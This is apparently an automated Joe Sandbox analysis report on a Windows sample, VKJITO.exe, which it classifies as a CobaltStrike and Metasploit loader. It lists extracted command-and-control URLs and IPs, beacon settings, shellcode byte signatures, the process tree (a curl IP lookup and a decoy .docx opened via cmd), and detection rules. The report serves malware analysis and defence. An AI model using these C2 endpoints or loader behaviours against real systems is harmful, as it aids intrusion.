Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
VKJITO.exe

Overview

General Information

Sample name:VKJITO.exe
Analysis ID:1577651
MD5:34bfa047aaca8fd4dc99759ebf0e1a6a
SHA1:ae43a10d462f09aa7b945b5b37aad9c0d1df4b01
SHA256:517b6b3e890f7b93e0006cd8486b778075ebcc647565d37f2186500a8ddc1ff7
Tags:exeuser-smica83
Infos:

Detection

CobaltStrike, Metasploit
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected CobaltStrike
Yara detected Metasploit Payload
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
Sigma detected: Communication To Uncommon Destination Ports
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • VKJITO.exe (PID: 7380 cmdline: "C:\Users\user\Desktop\VKJITO.exe" MD5: 34BFA047AACA8FD4DC99759EBF0E1A6A)
    • curl.exe (PID: 7396 cmdline: "curl" ip.sb MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • conhost.exe (PID: 7404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7516 cmdline: "cmd" /c start C:\Users\user\Desktop\???????.docx MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WINWORD.EXE (PID: 7656 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\???????.docx" /o "" MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
    • WerFault.exe (PID: 8100 cmdline: C:\Windows\system32\WerFault.exe -u -p 7380 -s 1164 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Cobalt Strike, CobaltStrikeCobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike

Malware Configuration

Threatname: CobaltStrike

{"C2Server": "http://39.159.139.109:8080/uz68", "User Agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"}

Threatname: Metasploit

{"Headers": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n", "Type": "Metasploit Download", "URL": "http://139.159.139.109/uz68"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB6BA.tmp.dmpWindows_Trojan_Metasploit_7bc0f998Identifies the API address lookup function leverage by metasploit shellcodeunknown
  • 0x1e24b:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB6BA.tmp.dmpWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
  • 0x1e2b7:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2082162177.00000266E7A40000.00000010.00001000.00020000.00000000.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
    00000000.00000002.2082162177.00000266E7A40000.00000010.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
      00000000.00000002.2082162177.00000266E7A40000.00000010.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_7bc0f998Identifies the API address lookup function leverage by metasploit shellcodeunknown
      • 0x11:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
      00000000.00000002.2082162177.00000266E7A40000.00000010.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
      • 0x7d:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
      00000000.00000002.2082182507.00000266E7A5C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
        Click to see the 3 entries

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Communication To Uncommon Destination Ports
        Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 139.159.139.109, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\VKJITO.exe, Initiated: true, ProcessId: 7380, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49705

        Suricata Signatures

        No Suricata rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Found malware configuration
        Source: 00000000.00000002.2082162177.00000266E7A40000.00000010.00001000.00020000.00000000.sdmpMalware Configuration Extractor: CobaltStrike {"C2Server": "http://39.159.139.109:8080/uz68", "User Agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"}
        Source: 00000000.00000002.2082182507.00000266E7A5C000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Metasploit {"Headers": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n", "Type": "Metasploit Download", "URL": "http://139.159.139.109/uz68"}
        Multi AV Scanner detection for submitted file
        Source: VKJITO.exeReversingLabs: Detection: 42%
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5C2940 BCryptGenRandom,GetCurrentProcessId,BCryptGenRandom,CreateNamedPipeW,GetLastError,BCryptGenRandom,CloseHandle,BCryptGenRandom,0_2_00007FF73A5C2940
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5C9A10 BCryptGenRandom,0_2_00007FF73A5C9A10
        Source: VKJITO.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: Binary string: VKJITO.pdb source: VKJITO.exe
        Source: Binary string: VKJITO.pdbH source: VKJITO.exe
        Source: winword.exeMemory has grown: Private usage: 1MB later: 86MB

        Networking

        barindex
        C2 URLs / IPs found in malware configuration
        Source: Malware configuration extractorURLs: http://39.159.139.109:8080/uz68
        Source: Malware configuration extractorURLs: http://139.159.139.109/uz68
        Source: global trafficTCP traffic: 192.168.2.7:49705 -> 139.159.139.109:8080
        Source: Joe Sandbox ViewIP Address: 104.26.13.31 104.26.13.31
        Source: Joe Sandbox ViewASN Name: HWCSNETHuaweiCloudServicedatacenterCN HWCSNETHuaweiCloudServicedatacenterCN
        Source: global trafficHTTP traffic detected: GET /uz68 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)Host: 139.159.139.109:8080Connection: Keep-AliveCache-Control: no-cache
        Source: unknownTCP traffic detected without corresponding DNS query: 139.159.139.109
        Source: unknownTCP traffic detected without corresponding DNS query: 139.159.139.109
        Source: unknownTCP traffic detected without corresponding DNS query: 139.159.139.109
        Source: unknownTCP traffic detected without corresponding DNS query: 139.159.139.109
        Source: unknownTCP traffic detected without corresponding DNS query: 139.159.139.109
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ip.sbUser-Agent: curl/7.83.1Accept: */*
        Source: global trafficHTTP traffic detected: GET /uz68 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)Host: 139.159.139.109:8080Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficDNS traffic detected: DNS query: time.windows.com
        Source: global trafficDNS traffic detected: DNS query: ip.sb
        Source: VKJITO.exe, 00000000.00000002.2082182507.00000266E7AB8000.00000004.00000020.00020000.00000000.sdmp, VKJITO.exe, 00000000.00000002.2082182507.00000266E7A5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://139.159.139.109:8080/uz68
        Source: VKJITO.exe, 00000000.00000002.2082182507.00000266E7A5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://139.159.139.109:8080/uz68d(
        Source: VKJITO.exe, 00000000.00000002.2082182507.00000266E7AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://139.159.139.109:8080/uz68dg
        Source: VKJITO.exe, 00000000.00000002.2082182507.00000266E7AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://139.159.139.109:8080/uz68ig
        Source: VKJITO.exe, 00000000.00000002.2082182507.00000266E7AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://139.159.139.109:8080/uz68ug
        Source: VKJITO.exe, 00000000.00000002.2082182507.00000266E7A5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://139.159.139.109:8080/uz68x(
        Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.7.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
        Source: curl.exe, 00000001.00000002.1364350016.00000138A0739000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip.sb/
        Source: curl.exe, 00000001.00000002.1364350016.00000138A0739000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip.sb/edNameSpaceh51
        Source: Amcache.hve.12.drString found in binary or memory: http://upx.sf.net

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 00000000.00000002.2082162177.00000266E7A40000.00000010.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
        Source: 00000000.00000002.2082162177.00000266E7A40000.00000010.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
        Source: 00000000.00000002.2082182507.00000266E7A5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
        Source: 00000000.00000002.2082182507.00000266E7A5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
        Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERB6BA.tmp.dmp, type: DROPPEDMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
        Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERB6BA.tmp.dmp, type: DROPPEDMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5C0E60 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,0_2_00007FF73A5C0E60
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5C0D00 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError,0_2_00007FF73A5C0D00
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A59CEC0 GetStdHandle,GetLastError,GetConsoleMode,NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,CloseHandle,0_2_00007FF73A59CEC0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5C29400_2_00007FF73A5C2940
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5C42F00_2_00007FF73A5C42F0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5C1CD00_2_00007FF73A5C1CD0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5CFCD00_2_00007FF73A5CFCD0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5AF9F00_2_00007FF73A5AF9F0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5CF9D00_2_00007FF73A5CF9D0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5A7A800_2_00007FF73A5A7A80
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5AAA600_2_00007FF73A5AAA60
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5D3AE00_2_00007FF73A5D3AE0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5D0AB00_2_00007FF73A5D0AB0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5CC0800_2_00007FF73A5CC080
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5D20700_2_00007FF73A5D2070
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5AB0400_2_00007FF73A5AB040
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5CD0400_2_00007FF73A5CD040
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5940F00_2_00007FF73A5940F0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5D00F00_2_00007FF73A5D00F0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5D0D800_2_00007FF73A5D0D80
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A598D400_2_00007FF73A598D40
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A594DF00_2_00007FF73A594DF0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5A7E600_2_00007FF73A5A7E60
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5CEEE00_2_00007FF73A5CEEE0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A59E3490_2_00007FF73A59E349
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5CD3300_2_00007FF73A5CD330
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5D53E00_2_00007FF73A5D53E0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5DD3D00_2_00007FF73A5DD3D0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5D94900_2_00007FF73A5D9490
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5A64400_2_00007FF73A5A6440
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5CF4300_2_00007FF73A5CF430
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5C21900_2_00007FF73A5C2190
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5C01200_2_00007FF73A5C0120
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5CE2000_2_00007FF73A5CE200
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5AE1E00_2_00007FF73A5AE1E0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A59F1C00_2_00007FF73A59F1C0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5CD1C00_2_00007FF73A5CD1C0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5CF7200_2_00007FF73A5CF720
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5A18800_2_00007FF73A5A1880
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5D08800_2_00007FF73A5D0880
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5A390F0_2_00007FF73A5A390F
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5A08B90_2_00007FF73A5A08B9
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A59B5900_2_00007FF73A59B590
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5925400_2_00007FF73A592540
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5C95300_2_00007FF73A5C9530
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5B95C00_2_00007FF73A5B95C0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5D05B00_2_00007FF73A5D05B0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5CE6700_2_00007FF73A5CE670
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5966500_2_00007FF73A596650
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5D26D30_2_00007FF73A5D26D3
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5D26A00_2_00007FF73A5D26A0
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: String function: 00007FF73A592AC0 appears 64 times
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: String function: 00007FF73A5DC330 appears 47 times
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: String function: 00007FF73A5AA450 appears 73 times
        Source: C:\Users\user\Desktop\VKJITO.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7380 -s 1164
        Source: 00000000.00000002.2082162177.00000266E7A40000.00000010.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
        Source: 00000000.00000002.2082162177.00000266E7A40000.00000010.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
        Source: 00000000.00000002.2082182507.00000266E7A5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
        Source: 00000000.00000002.2082182507.00000266E7A5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
        Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERB6BA.tmp.dmp, type: DROPPEDMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
        Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERB6BA.tmp.dmp, type: DROPPEDMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
        Source: classification engineClassification label: mal88.troj.winEXE@12/239@3/3
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF73A5C0FB0 memset,GetModuleHandleW,FormatMessageW,GetLastError,0_2_00007FF73A5C0FB0
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeFile created: C:\Users\user\Desktop\???????.docxJump to behavior
        Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7380
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user~1\AppData\Local\Temp\{688B8AE6-E969-4F29-8173-3E974F88B889} - OProcSessId.datJump to behavior
        Source: VKJITO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: VKJITO.exeReversingLabs: Detection: 42%
        Source: unknownProcess created: C:\Users\user\Desktop\VKJITO.exe "C:\Users\user\Desktop\VKJITO.exe"
        Source: C:\Users\user\Desktop\VKJITO.exeProcess created: C:\Windows\System32\curl.exe "curl" ip.sb
        Source: C:\Windows\System32\curl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\VKJITO.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c start C:\Users\user\Desktop\???????.docx
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\???????.docx" /o ""
        Source: C:\Users\user\Desktop\VKJITO.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7380 -s 1164
        Source: C:\Users\user\Desktop\VKJITO.exeProcess created: C:\Windows\System32\curl.exe "curl" ip.sbJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c start C:\Users\user\Desktop\???????.docxJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\???????.docx" /o ""Jump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: vcruntime140.dllJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\VKJITO.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
